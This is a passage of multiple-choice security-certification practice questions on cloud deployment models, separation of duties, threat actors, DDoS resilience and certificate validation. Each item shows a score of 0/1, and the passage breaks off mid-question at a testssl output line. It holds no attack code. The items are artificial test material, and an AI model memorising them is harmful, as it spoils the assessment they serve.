A security engineer based in Iceland works in an environment requiring an on-premises and cloud based storage solution. The solution should take into consideration the following: The company has sensitive data The company has proprietary data The company has its HQs in Iceland, and the data must always reside in that country Which cloud deployment model should be used? A. Public cloud B. Private cloud C. Community cloud D. Hybrid cloud Points: 0/1 17. A company is designing a new system that must have high security. This new system has the following requirements: Permissions must be assigned based on role Fraud from a single person must be prevented A single entity must not have full access control Which of the following can the company use to meet these requirements? A. Need to know B. Dual responsibility C. Seperation of duties D. Least privilege Points: 0/1 18. A company security engineer arrives at work to face the following scenario: Website defacement Calls from the company president indicating the website needs to be fixed immediately because its damaging the brand A job offer from the company’s competitor A security analyst’s investigative report, based on logs from the past 6 months, describing how lateral movement across the network from various IP addresses originating from a foreign adversary country resulted in exfiltrated data Which of the following threat actors is most likely involved? A. Organized crime B. Competitotr C. APT/Nation state D. Script kiddie Points: 0/1 19. A company has moved its sensitive workloads to the cloud and needs to ensure high availability and resiliency of its web based application. The cloud architecture team was given the following requirements: The app must run at 70% capacity at all times The app must sustain DoS and DDoS attacks Services must recover automatically Which of the following should the cloud architecture team implement? (Select THREE) A. Continuous snapshots B. Encryption C. BCP D. WAF E. 
Containerization F. Read-only replicas G. Autoscaling H. CDN Points: 0/1 20. When implementing serverless computing, an organization must still account for: A. hardware compatability B. the security of its data C. the underlying computing network infrastructure D. patching the service Points: 0/1 21. A software developer is working on a piece of code required by a new software package. The code should use a protocol to verify the validity of a remote identity. Which of the following should the developer implement in the code? A. CRL B. HSTS C. RSA D. OCSP Points: 0/1 22. An organization has an operational requirement with a specific equipment vendor. The organization is located in the United States, but the vendor is located in another region. Which of the following risks would be most concerning to the organization in the event of equipment failure? A. The organization requires authorized vendor specialists B. Shipping delays could cost the organization money C. Support may not be available during all business hours D. Each region has different regulatory frameworks to follow Points: 0/1 23. A major broadcasting company that requires continuous availability to streaming content needs to be resilient against DDoS attakcs, Which of the following is the most important infrastructure security design element to prevent an outage? A. Scaling horizontally to handle increases in traffic B. Supporting heterogenous architecture C. Ensuring cloud autoscaling is in place D. Leveraging content delivery network across multiple regions Points: 0/1 24. A security assessor identified an internet facing web service API provider that was deemed vulnerable. Execution of testssl provided the following insight: Start 2021-02-02 18:24:59 -->> 192.168.44.61:443 (192.168.44.61)